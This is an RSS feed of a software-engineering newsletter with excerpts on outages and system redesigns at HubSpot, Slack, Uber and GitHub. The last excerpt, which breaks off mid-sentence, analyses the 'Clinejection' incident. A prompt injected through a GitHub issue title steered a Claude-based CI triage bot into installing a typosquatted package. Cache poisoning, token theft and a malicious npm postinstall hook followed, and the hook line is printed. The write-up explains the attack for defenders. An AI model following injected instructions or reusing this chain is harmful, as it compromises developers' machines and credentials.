<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0"><channel><title><![CDATA[Byte-Sized Design]]></title><description><![CDATA[Master system design concepts, engineering fundamentals, and interview basics. Weekly summaries, post-mortems, and advice for 42,000+ engineers.]]></description><link>https://read.bytesizeddesign.com</link><image><url>https://substackcdn.com/image/fetch/$s_!UMZA!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06b64927-5de1-4edc-a245-b9b486e07503_1024x1024.png</url><title>Byte-Sized Design</title><link>https://read.bytesizeddesign.com</link></image><generator>Substack</generator><lastBuildDate>Fri, 24 Apr 2026 08:49:50 GMT</lastBuildDate><atom:link href="https://read.bytesizeddesign.com/feed" rel="self" type="application/rss+xml"/><copyright><![CDATA[Byte-Sized Design]]></copyright><language><![CDATA[en]]></language><webMaster><![CDATA[bytesizeddesign@substack.com]]></webMaster><itunes:owner><itunes:email><![CDATA[bytesizeddesign@substack.com]]></itunes:email><itunes:name><![CDATA[Byte-Sized Design]]></itunes:name></itunes:owner><itunes:author><![CDATA[Byte-Sized Design]]></itunes:author><googleplay:owner><![CDATA[bytesizeddesign@substack.com]]></googleplay:owner><googleplay:email><![CDATA[bytesizeddesign@substack.com]]></googleplay:email><googleplay:author><![CDATA[Byte-Sized Design]]></googleplay:author><itunes:block><![CDATA[Yes]]></itunes:block><item><title><![CDATA[HubSpot's 37-Minute Lesson in Why HTTP 200 Can Lie]]></title><description><![CDATA[The permission check that passed, the users who were locked out, and what monitoring for "availability" actually misses]]></description><link>https://read.bytesizeddesign.com/p/hubspots-37-minute-lesson-in-why</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/hubspots-37-minute-lesson-in-why</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Wed, 22 Apr 2026 16:34:15 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!UMZA!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06b64927-5de1-4edc-a245-b9b486e07503_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h3>TL;DR</h3><p>3:43 PM EST to 4:20 PM EST. 37 minutes. Every HubSpot customer lost the ability to click into contact, company, order, or project workflows in the UI. Deal-based and ticket-based workflows still worked. Every backend automation kept firing on schedule. No data lost. No execution missed.</p><p>And the whole thing flew under the radar because the endpoint that broke kept returning HTTP 200.</p><p>The incident monitoring didn&#8217;t catch it. The automated canary checks didn&#8217;t catch it. A 60-minute alert threshold meant the tests that <em>did</em> fail weren&#8217;t going to page anyone until well after customers had already flooded support.</p><p>This is a textbook case of the thing we keep writing about: your observability is only as good as what you&#8217;re actually measuring. If you&#8217;re measuring &#8220;did the server respond,&#8221; you&#8217;re going to miss every bug that makes the server respond <em>with the wrong answer.</em> HubSpot&#8217;s post-mortem is refreshingly direct about this, and there&#8217;s a clean lesson in it for anyone running permission systems, feature flags, or anything else where the shape of a correct response matters more than its existence.</p><p>If you&#8217;ve been around for <a href="https://bytesizeddesign.substack.com/p/cloudflares-july-2025-outage-the">the Cloudflare July 2025 outage breakdown</a> or the <a href="https://bytesizeddesign.substack.com/p/the-aws-october-20th-outage-dissection">AWS October 20th dissection</a>, this one will feel familiar. Different blast radius. Same category of failure.</p><div><hr></div><h3>So what actually happened?</h3><p>HubSpot was rolling out a permissions framework update. The goal was reasonable: replace a broad shared scope with narrower, object-type-specific scopes for contact, company, order, and project workflows. Tighter permissions, better isolation. Standard stuff.</p><p>The rollout had two pieces:</p><ol><li><p>Create the new permission scopes.</p></li><li><p>Promote the user role assignments that map those scopes to the right users.</p></li></ol><p>Piece one made it to production. Piece two didn&#8217;t.</p><p>The staging environment had both pieces, so staging worked. Production had scopes without role assignments, so production&#8217;s access-control system went looking for user-role mappings that didn&#8217;t exist. When it couldn&#8217;t find them, it did what permission systems are supposed to do: fail closed. Deny access.</p><p>From the access-control system&#8217;s perspective, this was correct behavior. Users were asking about permissions the system couldn&#8217;t verify, so the system returned a restrictive access level.</p><p>From the user&#8217;s perspective, their workflows vanished.</p><h3>The 200 that lied</h3><p>Here&#8217;s the part worth dwelling on. The access endpoint returned HTTP 200 the whole time. The server didn&#8217;t crash. It didn&#8217;t throw. It didn&#8217;t log an error. It just returned a technically-valid response that said &#8220;this user can barely do anything.&#8221; The frontend, doing its job, saw &#8220;barely anything&#8221; and hid the UI.</p><p>Most monitoring treats HTTP status codes as ground truth. 2xx is fine, 4xx is the client&#8217;s problem, 5xx pages the on-call. It&#8217;s a useful abstraction, and it&#8217;s wrong in exactly this scenario. The server is healthy. The payload is garbage.</p><p>We covered something very similar in <a href="https://bytesizeddesign.substack.com/p/how-twitch-caught-invisible-failures">how Twitch caught their invisible failures</a>&#8212;streams that terminated &#8220;successfully&#8221; from the server&#8217;s point of view while users saw nothing. Same failure mode, different domain. When correctness lives in the response body rather than the status line, your dashboards need to look inside the response.</p><h3>Why the canary didn&#8217;t save them</h3><p>HubSpot&#8217;s automated test suite <em>did</em> catch failures during the canary window. Those failures fired into a queue that was configured to wait 60 minutes before paging anyone.</p><p>Sixty minutes.</p><p>The deployment rolled out fully in 33 minutes. The entire incident lasted 37 minutes from first impact to rollback. The alerts would have arrived after the problem was already resolved.</p><p>Alert thresholds are a real tradeoff. Too tight and your on-call drowns in noise from flaky tests. Too loose and you get this. The right answer is rarely a single global threshold, it&#8217;s threshold <em>in context.</em> Failures during an active deployment window are categorically different from failures on a quiet Tuesday morning, and HubSpot is correctly calling that out in their remediation plan. Correlate the alerts with the deploys. Shrink the window to minutes during rollout.</p><p>This is the kind of instrumentation gap that shows up over and over in post-mortems. For more on how to actually write these documents well instead of just surviving them, <a href="https://bytesizeddesign.substack.com/p/writing-post-mortems-a-tech-leads">our tech lead&#8217;s guide to writing post-mortems</a> covers the framing that distinguishes a useful post-mortem from a corporate apology.</p><h3>The split-brain deployment</h3>
      <p>
          <a href="https://read.bytesizeddesign.com/p/hubspots-37-minute-lesson-in-why">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[Slack Rebuilt Notifications for Millions of Users]]></title><description><![CDATA[Slack rebuilt its notification system from scratch, here's the architecture decision that made it possible without breaking millions of users.]]></description><link>https://read.bytesizeddesign.com/p/slack-rebuilt-notifications-for-millions</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/slack-rebuilt-notifications-for-millions</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Mon, 30 Mar 2026 01:14:20 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/dcac9027-7ac5-4833-ba12-f4db942ef784_1160x653.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Notification overload is one of the top three reasons users contact Slack support. Not security incidents. Not data loss. Ping anxiety.</p><p>That stat is embarrassing for a company whose product is literally communication. But what&#8217;s interesting isn&#8217;t the problem, it&#8217;s why it was so hard to fix.</p><h3><strong>The system wasn&#8217;t broken. It was incoherent.</strong></h3><p>Desktop and mobile had entirely separate preference systems that had grown apart over years. &#8220;Nothing&#8221; on mobile meant something different from &#8220;Off&#8221; on desktop. Not slightly different. Architecturally different. One disabled push notifications. The other disabled in-app badges too. Users changing settings on one device had no predictable effect on the other.</p><p>This is how trust erodes. Not with crashes. With settings that don&#8217;t do what you think they do.</p><p>The core design flaw was a tight coupling between <em>what</em> notifies you and <em>how</em> you get notified. If you wanted fewer interruptions on mobile, your only lever also killed in-app awareness. There was no way to say &#8220;show me everything in the sidebar but only push me for mentions.&#8221; You had to pick between overload or ignorance.</p><h3><strong>Four preference systems became one</strong></h3><p>The old prefs looked like this:</p><pre><code><code>desktop: everything | mentions | nothing   // Push on desktop
mobile:  everything | mentions | nothing   // Push on mobile</code></code></pre><p>The word &#8220;nothing&#8221; is doing dishonest work there. Users who chose it thought they&#8217;d gone quiet. They hadn&#8217;t &#8212; they still got in-app badges. They just didn&#8217;t know it.</p><p>The new model decouples the two concerns cleanly:</p><pre><code><code>desktop: everything | mentions // What activity to show
desktop_push_enabled: true | false // Whether to interrupt you
mobile: everything | mentions | nothing</code></code></pre><p><code>desktop_push_enabled</code> is new. Because it had no prior value in the database, the team could backfill every existing user based on whether they&#8217;d previously set &#8220;off&#8221;, no disruption, no migration emails, no support tickets. &#8220;Off&#8221; became &#8220;mentions with push disabled&#8221; at read time, which is exactly what it meant in practice anyway.</p><p>That&#8217;s a clean migration. Backwards compatible, rollback-safe, and behaviorally honest.</p><h3><strong>The real difficulty: millions of users, years of state</strong></h3>
      <p>
          <a href="https://read.bytesizeddesign.com/p/slack-rebuilt-notifications-for-millions">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[How Uber Killed Hours-Old Data (And Why Your Batch Jobs Are a Liability)]]></title><description><![CDATA[What they found when they finally did the math on stale data.]]></description><link>https://read.bytesizeddesign.com/p/how-uber-killed-hours-old-data-and</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-uber-killed-hours-old-data-and</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Tue, 24 Mar 2026 05:16:10 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!lkl9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0e1db2f-b775-4ab4-9f03-3ae686fb9fa1_1536x699.avif" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>TLDR</h2><p>Hours-old data. Petabyte scale. Thousands of engineers making decisions on stale numbers.</p><p>Uber&#8217;s data lake powers Delivery, Mobility, Finance, Marketing Analytics, and Machine Learning for a company with hundreds of millions of users. For years, the ingestion layer ran on Spark batch jobs. Data arrived in the lake hours late. Sometimes a full day late.</p><p>That was fine when the business moved slowly. It stopped being fine when data freshness became a competitive bottleneck&#8212;when model iteration speed, real-time experimentation, and operational analytics demanded minutes, not hours.</p><p>So they rebuilt ingestion from scratch on Apache Flink. The result: freshness dropped from hours to minutes, compute costs dropped 25%, and the system now handles petabyte-scale streaming across thousands of datasets.</p><p>This is IngestionNext. And the problems they had to solve to get there are exactly the kind of problems most data teams quietly ignore until they can&#8217;t anymore.</p><div><hr></div><h2>The Dirty Secret About Batch Ingestion</h2><p>Here&#8217;s the thing nobody wants to say out loud: batch jobs are slow by design, and most teams have just accepted that as the cost of doing business.</p><p>You run a Spark job every hour. Maybe every 30 minutes if you&#8217;re ambitious. The job spins up, reads from Kafka or a transactional database, transforms the data, writes it to the lake. Then it tears down. An hour later, it does it all again.</p><p>At small scale this is totally fine. Predictable. Easy to debug. The operational overhead is low.</p><p>At Uber&#8217;s scale, hundreds of petabytes, thousands of datasets&#8212;those batch jobs were burning hundreds of thousands of CPU cores every day. Not because the work required that many cores. Because that&#8217;s how batch scheduling works. You provision for the peak, the peak is infrequent, and everything in between is wasted capacity.</p><p>And even if you ignore the cost problem, there&#8217;s no fixing the freshness problem. Batch is batch. If your job runs every hour, your data is up to an hour old. Period.</p><p>For model training, that&#8217;s a delay in experiment velocity. For fraud detection, that&#8217;s a window where bad actors operate undetected. For marketplace analytics, that&#8217;s a lag between what happened and when anyone can respond to it.</p><p>Uber looked at this and decided hours-old data was no longer acceptable. They needed minutes. That meant streaming.</p><blockquote><p>If you want to see how Uber&#8217;s data lake got to 350PB in the first place, and the replication problems that scale created, read <a href="https://bytesizeddesign.substack.com/p/how-uber-moved-1-petabyte-a-day-and">Inside Uber&#8217;s 350PB Data Lake: The Distcp Rewrite That 5x&#8217;d Performance</a>.</p><div class="digest-post-embed" data-attrs="{&quot;nodeId&quot;:&quot;ecef9490-62ae-427a-bd94-bb31d14e94a7&quot;,&quot;caption&quot;:&quot;TLDR 250 TB to 1 PB per day. One quarter. Daily replication jobs jumped from 10,000 to 374,000. Uber&#8217;s data lake hit 350 PB and their copy tool couldn&#8217;t keep up. The P100 SLA of 4 hours became a joke.&#8230;&quot;,&quot;cta&quot;:&quot;Read full story&quot;,&quot;showBylines&quot;:true,&quot;size&quot;:&quot;md&quot;,&quot;isEditorNode&quot;:true,&quot;title&quot;:&quot;Inside Uber&#8217;s 350PB Data Lake: The Distcp Rewrite That 5x&#8217;d Performance&quot;,&quot;publishedBylines&quot;:[{&quot;id&quot;:104689928,&quot;name&quot;:&quot;Byte-Sized Design&quot;,&quot;bio&quot;:&quot;Real talk about building systems that work. Career advice for growing engineers, how actual companies solve large-scale problems, post-mortems from things that broke, and the system design fundamentals that matter. No fluff, no buzzwords.&quot;,&quot;photo_url&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/75986514-8b28-4199-95ab-d22806dd8fe1_228x228.png&quot;,&quot;is_guest&quot;:false,&quot;bestseller_tier&quot;:100}],&quot;post_date&quot;:&quot;2026-02-11T20:46:19.711Z&quot;,&quot;cover_image&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8ead3563-41f5-4a1f-90ac-9b06292fc74b_1536x1003.avif&quot;,&quot;cover_image_alt&quot;:null,&quot;canonical_url&quot;:&quot;https://bytesizeddesign.substack.com/p/how-uber-moved-1-petabyte-a-day-and&quot;,&quot;section_name&quot;:null,&quot;video_upload_id&quot;:null,&quot;id&quot;:187673109,&quot;type&quot;:&quot;newsletter&quot;,&quot;reaction_count&quot;:9,&quot;comment_count&quot;:0,&quot;publication_id&quot;:1499683,&quot;publication_name&quot;:&quot;Byte-Sized Design&quot;,&quot;publication_logo_url&quot;:&quot;https://substackcdn.com/image/fetch/$s_!UMZA!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06b64927-5de1-4edc-a245-b9b486e07503_1024x1024.png&quot;,&quot;belowTheFold&quot;:true,&quot;youtube_url&quot;:null,&quot;show_links&quot;:null,&quot;feed_url&quot;:null}"></div></blockquote><div><hr></div><h2>Why Flink, Not Just &#8220;More Spark&#8221;</h2><p>The obvious question: why not just run Spark Structured Streaming? It exists. It integrates with Kafka. Half the data ecosystem already knows how to use it.</p><p>Because Spark Structured Streaming still thinks in micro-batches. It&#8217;s better than full batch scheduling, but it&#8217;s not true streaming. You&#8217;re still dealing with the same fundamental model: accumulate records, process a chunk, commit.</p><p>Flink is a different mental model. It processes records as they arrive. Checkpoints are asynchronous, not tied to batch intervals. The state management is first-class. For continuous ingestion at this scale, Flink&#8217;s execution model is a better fit.</p><p>Uber already had Flink infrastructure. The ecosystem supported it. That made the decision easier, but the architecture challenges were anything but easy.</p><blockquote><p>Pinterest went through a similar reckoning with Spark at scale, rebuilding their entire Hadoop-based platform into a container-native Spark system. Worth reading alongside this one: <a href="https://bytesizeddesign.substack.com/p/how-pinterest-runs-spark-at-scale">How Pinterest Runs Spark at Scale with Moka</a>.</p><div class="digest-post-embed" data-attrs="{&quot;nodeId&quot;:&quot;a36cfc92-b286-409a-a131-d5531bf53ae1&quot;,&quot;caption&quot;:&quot;Pinterest&#8217;s old data platform was called Monarch. It ran on Hadoop. It powered everything from ad analytics to recommendation training.&quot;,&quot;cta&quot;:&quot;Read full story&quot;,&quot;showBylines&quot;:true,&quot;size&quot;:&quot;md&quot;,&quot;isEditorNode&quot;:true,&quot;title&quot;:&quot;&#9889; How Pinterest Runs Spark at Scale with Moka&quot;,&quot;publishedBylines&quot;:[{&quot;id&quot;:104689928,&quot;name&quot;:&quot;Byte-Sized Design&quot;,&quot;bio&quot;:&quot;Real talk about building systems that work. Career advice for growing engineers, how actual companies solve large-scale problems, post-mortems from things that broke, and the system design fundamentals that matter. No fluff, no buzzwords.&quot;,&quot;photo_url&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/75986514-8b28-4199-95ab-d22806dd8fe1_228x228.png&quot;,&quot;is_guest&quot;:false,&quot;bestseller_tier&quot;:100}],&quot;post_date&quot;:&quot;2025-10-07T07:53:29.278Z&quot;,&quot;cover_image&quot;:&quot;https://substackcdn.com/image/fetch/$s_!UHvU!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4cec44d8-0e9b-487f-a49c-ab0c2307b899_1100x589.webp&quot;,&quot;cover_image_alt&quot;:null,&quot;canonical_url&quot;:&quot;https://bytesizeddesign.substack.com/p/how-pinterest-runs-spark-at-scale&quot;,&quot;section_name&quot;:null,&quot;video_upload_id&quot;:null,&quot;id&quot;:175505751,&quot;type&quot;:&quot;newsletter&quot;,&quot;reaction_count&quot;:6,&quot;comment_count&quot;:0,&quot;publication_id&quot;:1499683,&quot;publication_name&quot;:&quot;Byte-Sized Design&quot;,&quot;publication_logo_url&quot;:&quot;https://substackcdn.com/image/fetch/$s_!UMZA!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06b64927-5de1-4edc-a245-b9b486e07503_1024x1024.png&quot;,&quot;belowTheFold&quot;:true,&quot;youtube_url&quot;:null,&quot;show_links&quot;:null,&quot;feed_url&quot;:null}"></div></blockquote><div><hr></div><h2>The Architecture</h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!lkl9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0e1db2f-b775-4ab4-9f03-3ae686fb9fa1_1536x699.avif" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!lkl9!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0e1db2f-b775-4ab4-9f03-3ae686fb9fa1_1536x699.avif 424w, https://substackcdn.com/image/fetch/$s_!lkl9!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0e1db2f-b775-4ab4-9f03-3ae686fb9fa1_1536x699.avif 848w, https://substackcdn.com/image/fetch/$s_!lkl9!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0e1db2f-b775-4ab4-9f03-3ae686fb9fa1_1536x699.avif 1272w, https://substackcdn.com/image/fetch/$s_!lkl9!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0e1db2f-b775-4ab4-9f03-3ae686fb9fa1_1536x699.avif 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!lkl9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0e1db2f-b775-4ab4-9f03-3ae686fb9fa1_1536x699.avif" width="1456" height="663" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e0e1db2f-b775-4ab4-9f03-3ae686fb9fa1_1536x699.avif&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:663,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:43197,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/avif&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://bytesizeddesign.substack.com/i/191947351?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0e1db2f-b775-4ab4-9f03-3ae686fb9fa1_1536x699.avif&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!lkl9!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0e1db2f-b775-4ab4-9f03-3ae686fb9fa1_1536x699.avif 424w, https://substackcdn.com/image/fetch/$s_!lkl9!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0e1db2f-b775-4ab4-9f03-3ae686fb9fa1_1536x699.avif 848w, https://substackcdn.com/image/fetch/$s_!lkl9!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0e1db2f-b775-4ab4-9f03-3ae686fb9fa1_1536x699.avif 1272w, https://substackcdn.com/image/fetch/$s_!lkl9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0e1db2f-b775-4ab4-9f03-3ae686fb9fa1_1536x699.avif 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Events arrive in Kafka. Flink jobs consume them continuously and write to the data lake in Hudi format.</p><p>Hudi is doing serious work here. It provides transactional commits, rollback support, and time travel queries on top of what would otherwise be raw Parquet files on object storage. When a Flink job fails mid-write, Hudi rolls back the uncommitted data. When someone wants to query data as of a specific timestamp, Hudi handles it.</p><p>Above the data plane sits a control plane that manages the job lifecycle across thousands of datasets. Create, deploy, restart, stop, delete&#8212;all automated. Configuration changes propagate without manual intervention. Health checks run continuously. This isn&#8217;t glamorous infrastructure work, but at Uber&#8217;s scale, &#8220;we have 4,000 ingestion jobs&#8221; means operations without a control plane is a full-time fire drill.</p><p>There&#8217;s also regional failover. If a region goes dark, ingestion jobs reroute or fall back to batch mode. No data loss. No manual intervention required.</p><p>The architecture isn&#8217;t surprising. The interesting parts are the problems that showed up once it was running.</p><div><hr></div><h2>Problem 1: Streaming Creates a Small File Nightmare</h2>
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-uber-killed-hours-old-data-and">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[GitHub’s Elasticsearch Problem Was Seven Years in the Making. Here’s How They Finally Fixed It]]></title><description><![CDATA[Why the right fix wasn't available until now, and what they did in the meantime.]]></description><link>https://read.bytesizeddesign.com/p/githubs-elasticsearch-problem-was</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/githubs-elasticsearch-problem-was</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Mon, 16 Mar 2026 06:51:44 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!UMZA!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06b64927-5de1-4edc-a245-b9b486e07503_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h3><strong>TL;DR</strong></h3><p>GitHub Enterprise Server runs search on Elasticsearch. It also runs High Availability with a primary/replica model. For years, those two things could not coexist cleanly. Elasticsearch would move a primary shard to the read-only replica node. If you then took down that replica for maintenance, the whole thing deadlocked. The replica waited for Elasticsearch to recover before it could start. Elasticsearch couldn&#8217;t recover until the replica rejoined.</p><p>GitHub engineers knew this was broken. They spent years trying to patch around it. It took until Elasticsearch shipped Cross Cluster Replication to actually fix it.</p><p>The fix is live in GHES 3.19.1. The lesson underneath it is older than GitHub.</p><div><hr></div><h3><strong>The Original Sin Was a Reasonable Decision</strong></h3><p>Let&#8217;s be precise about what went wrong here, because it&#8217;s easy to read this story as &#8220;Elasticsearch bad&#8221; when the real issue is more interesting.</p>
      <p>
          <a href="https://read.bytesizeddesign.com/p/githubs-elasticsearch-problem-was">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[How a 12-Word Issue Title Owned 4,000 Developer Machines]]></title><description><![CDATA[TLDR One GitHub issue title.]]></description><link>https://read.bytesizeddesign.com/p/how-a-github-issue-title-installed</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-a-github-issue-title-installed</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Sat, 07 Mar 2026 08:20:05 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!UMZA!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06b64927-5de1-4edc-a245-b9b486e07503_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>TLDR</h2><p>One GitHub issue title. Five steps. 4,000 compromised developer machines. Eight hours before anyone noticed.</p><p>The entry point wasn&#8217;t a zero-day. It wasn&#8217;t a misconfigured S3 bucket or a stolen password. It was natural language, a crafted string in an issue title that an AI triage bot read, interpreted as an instruction, and executed with full CI privileges.</p><p>This is Clinejection. It&#8217;s worth understanding in detail, because the attack surface it exposed isn&#8217;t unique to Cline. It&#8217;s in your repo too.</p><div><hr></div><h2>The Attack Chain Nobody Had a Playbook For</h2><p>On February 17, 2026, someone published <code>cline@2.3.0</code> to npm. The CLI binary was byte-identical to the previous version. The only change was one line in <code>package.json</code>:</p><p>json</p><pre><code><code>"postinstall": "npm install -g openclaw@latest"</code></code></pre><p>For the next eight hours, every developer who installed or updated Cline got OpenClaw&#8212;a separate AI agent with full system access&#8212;silently installed on their machine. About 4,000 downloads before the package was pulled.</p><p>Here&#8217;s how the attacker got the npm token to publish it.</p><div><hr></div><h2>Step 1: Prompt Injection Via Issue Title</h2><p>Cline had deployed an AI-powered issue triage workflow using Anthropic&#8217;s <code>claude-code-action</code>. The workflow allowed any GitHub user to trigger it by opening an issue. The issue title was interpolated directly into Claude&#8217;s prompt:</p><p>yaml</p><pre><code><code>${{ github.event.issue.title }}</code></code></pre><p>No sanitisation. The attacker opened Issue #8904 with a title that looked like a performance report but contained an embedded instruction: install a package from a specific GitHub repository.</p><p>Claude read the issue title as part of the prompt. Claude followed the instruction. That&#8217;s prompt injection. It&#8217;s well-documented. It&#8217;s not new. It just hadn&#8217;t been weaponised against a CI workflow at this scale before.</p><div><hr></div><h2>Step 2: The Bot Executes Arbitrary Code</h2><p>Claude ran <code>npm install</code> pointing to the attacker&#8217;s fork&#8212;a typosquatted repository named <code>glthub-actions/cline</code>. Note the missing &#8216;i&#8217; in &#8216;github&#8217;. The fork&#8217;s <code>package.json</code> contained a preinstall script that fetched and executed a remote shell script.</p><p>This is where most engineers mentally say &#8220;we would catch that.&#8221; You wouldn&#8217;t. The bot ran with the privileges of the CI environment. There was no human in the loop. The operation looked like routine dependency installation.</p><div><hr></div><h2>Step 3: Cache Poisoning</h2><p>The shell script deployed Cacheract&#8212;a GitHub Actions cache poisoning tool. It flooded the cache with over 10GB of data, triggering GitHub&#8217;s LRU eviction policy. The legitimate cache entries got evicted. The poisoned entries were keyed to match the pattern used by Cline&#8217;s nightly release workflow.</p><p>When that workflow ran and restored <code>node_modules</code> from cache, it got the compromised version.</p><div><hr></div><h2>Step 4: Credential Theft</h2><p>The compromised <code>node_modules</code> ran during the release workflow&#8212;the one that held <code>NPM_RELEASE_TOKEN</code>, <code>VSCE_PAT</code>, and <code>OVSX_PAT</code>. All three exfiltrated.</p><div><hr></div><h2>Step 5: Malicious Publish</h2><p>Using the stolen npm token, the attacker published <code>cline@2.3.0</code> with the OpenClaw postinstall hook. The package was live for eight hours before StepSecurity&#8217;s automated monitoring flagged it&#8212;approximately 14 minutes after publication.</p><div><hr></div><h2>The Botched Rotation That Made It Worse</h2><p>Security researcher Adnan Khan had discovered and reported the full vulnerability chain on January 1, 2026. He followed up multiple times over five weeks. No response.</p><p>When Khan publicly disclosed on February 9, Cline patched within 30 minutes by removing the AI triage workflows. They started credential rotation the next day.</p><p>Then they deleted the wrong token. The 